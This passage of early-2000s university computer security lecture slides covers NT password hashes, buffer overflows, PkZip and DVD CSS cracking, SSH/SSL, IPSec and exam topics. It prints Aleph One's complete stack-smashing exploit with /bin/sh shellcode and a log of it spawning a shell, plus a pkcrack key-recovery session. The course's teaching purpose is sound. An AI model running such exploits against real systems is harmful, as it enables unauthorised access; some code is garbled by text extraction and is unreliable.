This calculation is done on both hashes of the user’spassword, and both responses are returned to the server,giving two 24 byte values.



The server then reproduces the above calculation, us-ing its own value of the 16 byte hashed password andthe challenge value that it kept during the initial protocolnegotiation.

It then checks to see if the 24 byte value it calculatesmatches the 24 byte value returned to it from the client.

If these values match exactly, then the client knew thecorrect password and is allowed access.



There are good points about this:

• The server never knows or stores the cleartext of theusers password - just the 16 byte hashed values derivedfrom it.

• The cleartext password or 16 byte hashed values arenever transmitted over the network - thus increasing se-curity.



However, there is also a bad side:

• The 16 byte hashed values are a "password equivalent".You cannot derive the users password from them, butthey can be used in a modified client to gain access toa server.

• The initial protocol negotiation is generally insecure, andcan be hijacked in a range of ways. One common hijackinvolves convincing the server to allow clear-text pass-words.



Despite functionality added to NT to protect unauthorizedaccess to the SAM, the mechanism is trivially insecure

Both the hashed values can be retrieved using the net-work sniffer mentioned before, and they are as-good-aspasswords.


Attack

Relies on flawed mechanism.

Even without network access, it is possible by variousmeans to access the SAM password hashes, and withnetwork access it is easy.

The hashed values are password equivalents, and maybe used directly if you have modified client software.

The attack considered here is the use of either a dic-tionary, or brute force attack directly on the passwordhashes (which must be first collected somehow).


Attack

L0phtCrack is a tool for turning Microsoft Lan Manager andNT password hashes back into the original clear text pass-words. It may be configured to run in different ways.

Dictionary cracking: L0phtCrack running on a PentiumPro 200 checked a password file with 100 passwordsagainst a 8 Megabyte (about 1,000,000 word) dictionaryfile in under one minute.

Brute force: L0phtCrack running on a Pentium Pro 200checked a password file with 10 passwords using the al-pha character set (A-Z) in 26 hours.


Attack time

Character set size Size of computation Relative time taken

26 8.353 ∗ 109 1.00

36 8.060 ∗ 1010 9.65

46 4.455 ∗ 1011 53.33

68 6.823 ∗ 1012 816.86

So if 26 characters takes 26 hours to complete, a worst-case scenario for 36 characters (A-Z,0-9) would take 250hours or 10.5 days. A password such as take2asp1r1nwould probably be computed in about 7 days.


Microsoft base security fix

1. Disable the use of LanManager passwords.

2. Don’t log in over network as administrator

3. Encrypt all network traffic

4. Use long passwords, and all allowable characters

5. Use an alternative login system

6. Use an unsniffable network cabling system.


Chapter 10

Lecture 10 - More(in)security


Last session



• UNIX passwords

• NT passwords


This session

• Buffer overflow attacks

• PkZip attack

• DVDs and the CSS

• SSH and SSL

• PGPfone


Buffer overflow

Most well known compromise of computer systems

One of a general class of problems caused by

software that does not check its parameters for ex-treme values.


Buffer overflow

Examine the way programs use memory.

Presentation based on

http://destroy.net/machines/security/P49-14-Aleph-One


http://destroy.net/machines/security/P49-14-Aleph-One

Simple Program

void main (int argc, char *argv[]) char buffer[512]; printf ("Argument is %s\n", argv[1]); strcpy (buffer, argv[1]);

CODE LISTING vulnerable.c


Simple Program

When we run it:

[hugh@pnp176-44 programs]$ ./vulnerable testArgument is test[hugh@pnp176-44 programs]$ ./vulnerable “A Longer Test”Argument is A Longer Test[hugh@pnp176-44 programs]$


Simple program

Stack

Stack grows down...

Return address

Buffer (512 bytes)

Computer’s Memory

ArgumentsVariables


Smashing the stack!

Stack

Stack grows down...

Return address

Computer’s Memory

ArgumentsVariables


Working and not working!

[hugh@pnp176-44 programs]$ ./vulnerable ddddd


Exploit...

#include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 char shellcode[] = " \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" " \x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" " \x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp ( void) __asm__ (" movl %esp,%eax"); void main ( int argc, char *argv[]) char *buff, *ptr; long *addr_ptr, addr; int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi (argv[1]); if (argc > 2) offset = atoi (argv[2]); if (!(buff = malloc (bsize))) printf (" Can’t allocate memory.\n"); exit (0); addr = get_sp () − offset; printf (" Using address: 0x%x\n", addr); ptr = buff; addr_ptr = ( long *) ptr; for (i = 0; i < bsize; i += 4) *(addr_ptr++) = addr; for (i = 0; i < bsize / 2; i++) buff[i] = NOP; ptr = buff + ((bsize / 2) − (strlen (shellcode) / 2)); for (i = 0; i < strlen (shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize − 1] = ’ \0’; memcpy (buff, " EGG=", 4); putenv (buff); system (" /bin/bash");

CODE LISTING exploit3.cCODE LISTING exploit3.c


Exploit

[hugh@pnp176-44 programs]$ ./exploit3 560Using address: 0xbfffe998[hugh@pnp176-44 programs]$ ./vulnerable $EGGArgument is ????????...???????sh-2.05b$

We are now within the vulnerable program process, but run-ning the sh shell program, instead of the vulnerable pro-gram.


Using the buffer overflow attack

A server (say a web server) that expects a query, andreturns a response.

A CGI/ASP or perl script inside a web server

A SUID root program on a UNIX system


Example attack - Blaster

Recently we have been having a series of attacks on Mi-crosoft systems that are based on various buffer overflowproblems.

The Blaster worm is described in the CERT advisory“CA-2003-20 W32/Blaster worm”:

The W32/Blaster worm exploits a vulnerability inMicrosoft’s DCOM RPC interface as described inVU#568148 and CA-2003-16. Upon successful exe-cution....


Example attack CRC-32 on ssh

http://razor.bindview.com/publish/advisories/adv ssh1crc.html


http://razor.bindview.com/publish/advisories/adv_ssh1crc.html

This session


• PkZip attack


• SSH and SSL

• PGPfone


PkZip stream cipher

PkZip is for compressing files

PkZip can also scramble files when given a secret pass-word.

Enciphering strategy is weak and can be cracked

http://citeseer.nj.nec.com/122586.html

Weakness in the (homegrown) ciphering algorithm


http://citeseer.nj.nec.com/122586.html

PkZip stream cipher

opo 144% pkcrack -C all.zip -c readme.doc -P plain.zip -p readme.docFiles read. Starting stage 1 on Wed Sep 8 09:04:02 1999Generating 1st generation of possible key2 421 values...done.Found 4194304 possible key2-values.Now we’re trying to reduce these...Done. Left with 18637 possible Values. bestOffset is 24.Stage 1 completed. Starting stage 2 on Thu Sep 9 09:12:06 1999Ta-daaaaa! key0=dda9e469, key1=96212999, key2=f9fc9651Probabilistic test succeeded for 402 bytes.Stage2 completed. Starting pass-word search on Thu Sep 9 09:22:22 1999Key: 73 65 63 72 65 74Or as a string: ’secret’ (without the enclosing single quotes)Finished on Thu Sep 9 10:54:22 1999 opo 99%opo 145% ./zipdecrypt dda9e469 96212999 f9fc9651 all.zip rr.zipopo 146%

rr.zip contains unencypted version of archive


PkZip stream cipher fix

The PkZip stream cipher is also susceptible to dictionaryattacks, and so it is considered not suitable for secure en-cryption of data. The fix is:

Don’t use PkZip for security purposes.


This session


• PkZip attack


• SSH and SSL

• PGPfone


DVD security

Content Scrambling System - data encryption scheme

Developed by commercial interests to stop copying... but

Easy to copy a DVD, but CSS prevents decrypting,changing and re-recording.

Details are trade secret.

Master set of 400 keys is stored on every DVD, and theDVD player uses these to generate a key needed to de-crypt data from the disc.


DVD security

Linux users were excluded from access to CSS licensesbecause of the open-source nature of Linux.

In October 1999, hobbyists/hackers in Europe crackedthe CSS algorithm

DVD industry players have been trying to prevent distri-bution of any software

The source code for decoding DVD is available on a T-shirt.


DVD security

The lesson to learn from this is that once-againsecurity-through-obscurity is a very poor strategy.

The source code and detailed descriptions for a CSS de-scrambler is available at:

http://www-2.cs.cmu.edu/˜dst/DeCSS/Gallery/


http://www-2.cs.cmu.edu/~dst/DeCSS/Gallery/

DVD security

Description of the key/descrambling process:

First one must have a master key, which is unique tothe DVD player manufacturer. It is also known as aplayer key. The player reads an encrypted disk keyfrom the DVD, and uses its player key to decrypt thedisk key. Then the player reads the encrypted title keyfor the file to be played. (The DVD will likely containmultiple files, typically 4 to 8, each with its own titlekey.) It uses the decrypted disk key (DK) to decryptthe title key. Finally, the decrypted title key, TK, is usedto descramble the actual content.


DVD security

Confusion and diffusion...

#define m(i)(x[i]^s[i+84])< <unsigned char x[5],y,s[2048];main(n)for(read(0,x,5);read(0,s,n=2048);write(1,s ,n))if(s[y=s[13]%8+20]/16%4==1)int i=m(1)17^256+m(0)8,k=m(2)0,j=m(4)17^m(3)9^k *2-k%8^8,a=0,c=26;for(s[y]-=16;--c;j*=2)a=a*2î&1,i=i/2^j&1< <24;for(j=127;++j<n ;c=c>y)c+=y=iî/8î> >4î> >12,i=i> >8^y< <17,a^=a> >14,y=aâ*8â< <6,a=a> >8^y< <9,k=s [j],k="7Wo~’G \216"[k&7]+2^"cr3sfw6v;*k+>/n."[k> >4]*2^k*257/8,s[j]=k^(k&k*2&34) *6^c+~y;


This session


• PkZip attack


• SSH and SSL

• PGPfone


ssh

For logging in a remote machine

Has secure encrypted communications, and...

You can’t snoop or sniff passwords.

TCP/IP connections can be forwarded over the securechannel.


ssh - proving identity

1. /etc/hosts.equiv: same user name? OK - log in!I

2. ~/.rhosts: by user? OK - log in!

3. RSA: authentication using public-key cryptography.

4. TIS: trusted server to authenticate the user.

5. Passwords: password sent encrypted...


RSA key management

The file ~/.ssh/authorized keys lists the public keys for log-ging in.

• Initially: ssh program tells the server which key pair itwould like to use

• Challenge: server sends challenge encrypted with pub-lic key.

• Decrypt: client decrypts using private key. The chal-lenge returned as proof


Port forwarding

Secure shell supports TCP/IP port forwarding

For example - if we wanted to use a secure channel toour X display on the local machine, the proxy listens forconnections on a port, forwards the connection requestand any data over the secure channel, and makes a con-nection to the real X display from the SSH Terminal.


Secure Sockets Layer (SSL)

Netscape has protocol for data security - uses 128-bitkeys.

data encryption, server authentication, message integrity, and optional client authentication

SSL is an open, nonproprietary protocol


UN-SSL

Netscape weakly seeds a random number generator

Someone who can snoop the network and has access toan account can discover seed

Expected search space similar to brute-forcing a 40-bitkey


This session


• PkZip attack


• SSH and SSL

• PGPfone


PGPfone


PGPfone

Speech compression and strong cryptography

Available in two versions:

1. An international version available outside America,and a prohibited import into America.

2. An American version available inside America, and aprohibited import out of America.

These two versions are also exactly the same! Restrictionson the import and export of munitions - strong cryptographyis considered a munition.


PGPfone

Familiar encryption and key exchange parameters:

When initially setting up a link, Diffie-Hellman key exchangeis used to ensure safety in the choice of an encryption key.


Chapter 11

Lecture 11 - Security


Last session


• PkZip attack


• SSH and SSL

• PGPfone


This session

• Design principles

• Biometrics

• IPSec

• Formal methods

• Formal evaluation

• Exam


Design principles

Paper by Saltzer and Schroeder, summarized below:

• Economy of mechanism: Keep the design as simpleand small as possible. (identd assumption)

• Fail-safe defaults: Base access decisions on permis-sion rather than exclusion. This is conservative design.(mail server - mail only access)

• Complete mediation: Every access to every objectmust be checked for authority. (DNS cache poisoning)


Design principles

• Open design: The design should not be secret. (DVDs,Microsoft SAM hashes...)

• Separation of privilege: Two keys are better than one.No single event can compromise the system. (su - pass-word and wheel group)

• Least privilege: Every program and every user of thesystem should operate using the least set of privilegesnecessary to complete the job. (Military need-to-know)


Design principles

• Least common mechanism: Minimize the amount ofmechanism common to more than one user and de-pended on by all users. (supervisor or library).

• Psychological acceptability: Human interface easy touse.

In the textbook there are examples of the use of each ofthese design principles.


This session


• Biometrics

• IPSec

• Formal methods


• Exam


Biometrics

Biometrics is the use of human physical characteristics tosupport authentication .


Biometrics - eyes


Minimal hardware biometrics

Voices - Record and process voice leading to eitherspeaker verification or recognition.

Faces - Capture either a static or moving image of a face.

Keystrokes - capture a sequence of keystrokes, record-ing timing.

Combinations of characteristics may be used, but in generalbiometric techniques are not reliable on their own. Goodsecond key for separation of privilege .


This session


• Biometrics

• IPSec

• Formal methods


• Exam


IPSec

IPSec is a set of standards intended to support com-munication security between networked computers, par-ticularly in the newer IPv6 (IP Next-Generation) network.

IPSec software is available in Windows2000, Linux, andon routers on the Internet.

http://www.faqs.org/rfcs/rfc2401.html

IPSec may be used in a range of ways.


http://www.faqs.org/rfcs/rfc2401.html

IPSec VPN

ISP


IPSec point-to-point


IPSec network-to-network


IPSec headers

There are two types of header, one used for authentica-tion , and the other used for encryption :

1. AH - the Authentication Header for data integrity, anti-replay and authentication

2. ESP - the Encapsulating Security Payload header, forconfidentiality. ESP can also provide AH services.

Communicating parties agree on a Security Association(SA), one SA for each direction, and one SA for each typeof communication.


Modes of operation

• An end-to-end SA - Transport mode

IPv6 hdr

OriginalIPv6 hdr

AHOriginal

ESP

Transport segment

Transport segment ESP

authenticated

encrypted

authenticated


Modes of operation

• An SA between security gateways - Tunnel mode

IPv6 hdr

IPv6 hdr

AH

ESP

authenticated

encrypted

authenticated

New

New

IPv6 hdrOriginal

OriginalIPv6 hdr

Transport segment

Transport segment ESP

SAs form a kind of distributed database.


This session


• Biometrics

• IPSec

• Formal methods


• Exam


Formal methods

FM encompasses a wide range of techniques...

Model checking:

constructing formal models , with appropriate formal specifications .

Example is Promela and Spin .


Promela and spin

The language Promela is ’C’ like, with an initializationprocedure. It can model asynchronous or synchronous,deterministic or non-deterministic systems

Spin is the checker for Promela models

Assertions to test correctness of model:

assert(some boolean condition);

If condition not TRUE then assertion violated.


Temporal claims

We got here again without making any progress!

The support for temporal claims takes the form of:

Endstate labels - for determining valid endstates Progress labels - claim no non-progress cycles Never claims - impossible temporal assertions


Simple example

Bin

BA

Bout

BtoA

AtoB

Ain Aout


Promela example

init

chan AtoB = [1] of mtype,byte ;chan BtoA = [1] of mtype,byte ;chan Ain = [2] of mtype,byte ;chan Bin = [2] of mtype,byte ;chan Aout = [2] of mtype,byte ;chan Bout = [2] of mtype,byte ;atomic

run application( Ain,Aout );run transfer( Aout,Ain,BtoA,AtoB );run transfer( Bout,Bin,AtoB,BtoA );run application( Bin,Bout )

;AtoB!err(0)


Promela example

#define MAX 10mtype = ack, nak, err, next, accept proctype transfer( chan in, out, chin, chout )

byte o,i;in?next(o);do

:: chin?nak(i) -> out!accept(i); chout!ack(o):: chin?ack(i) -> out!accept(i); in?next(o); chout!ack(o):: chin?err(i) -> chout!nak(o)

od


Promela example

proctype application( chan in, out )

int i=0, j=0, last i=0;do

:: in?accept(i) ->assert( i==last i );if

:: (last i!=MAX) -> last i = last i+1:: (last i==MAX)

fi:: out!next(j) ->

if:: (j!=MAX) -> j=j+1:: (j==MAX)

fiod


Spin simulation


This session


• Biometrics

• IPSec

• Formal methods


• Exam


Formal evaluation - TCSEC

TCSEC (The Orange book) was the first rating system forthe security of products. It defined six different evaluationclasses. The classes are:

• C1 - For same-level security access. Not currently used.

• C2 - Controlled access protection - users are individ-ually accountable for their actions. Most OS manufactur-ers have C2 versions of the OS.

• B1 - Mandatory BLP policies - for more secure systemshandling classified data.


Formal evaluation - TCSEC

• B2 - structured protection - mandatory access controlfor all objects in the system. Formal models.

• B3 - security domains - more controls, minimal com-plexity, provable consistency of model.

• A1 - Verified design - consistency proofs betweenmodel and specification.


Formal evaluation - ITSEC

From Dutch, English, French and German national se-curity evaluation criteria .

Adaptable .

Sponsor determines operational requirements, threatsand security objectives.

ITSEC specifies the interactions and documents be-tween the sponsor and the evaluator.


ITSEC

Again there are various levels of evaluation: E0..E6, withE6 giving the highest level of assurance - it requires twoindependant formal verifications.

First certification of a smart-card system under E6.

The smart-cards are electronic purses - that is theycarry value,

Forgery must be impossible. The certification encompassed the communication

with the card, as well as the software within the card,and at the bank.


Data Diode E6, BLP

Data Diode

High Security

Low security


This session


• Biometrics

• IPSec

• Formal methods


• Exam


Exam

You can expect 12 pages - write on paper. Marks/50.

10 short answer questions worth 1 mark each

Longer questions on...

Encryption Information Models Key systems


Exam

Modulo, primes, Fermat, Euler: general & specific

Symmetric cryptosystems: IC, DES, general & specific

Physical limits: general

Information theory: general & security-specific

Models: BLP, Biba - general & specific

Key systems: RSA, Kerberos, specific


Dr Robert Deng

Real World Applications of Network/Computer Security

Abstract: The lecture is on practical applications of net-work and computer security technology. Examples in-clude virtual private networks, security solutions for e-banking, fair exchange of digital valuables over the Inter-net (e.g., electronic contract signing over a network andcertified e-mail delivery) and techniques for user privacyprotection in cyberspace.


Finally

This is my last lecture, so...

Good luck with the exam, and

Thanks for your attention

Good luck!


Contents

1 Lecture 1 - Introduction

2 Lecture 2 - Preliminaries





6 Lecture 6 - Errors

7 Lecture 7 - Encryption

8 Lecture 8 - Protocols

9 Lecture 9 - System (in)security

10 Lecture 10 - More (in)security


11 Lecture 11 - Security


introduction to computer security cs3235 - nus …cs3235/2003-semesteri/foils.pdf · introduction...

Documents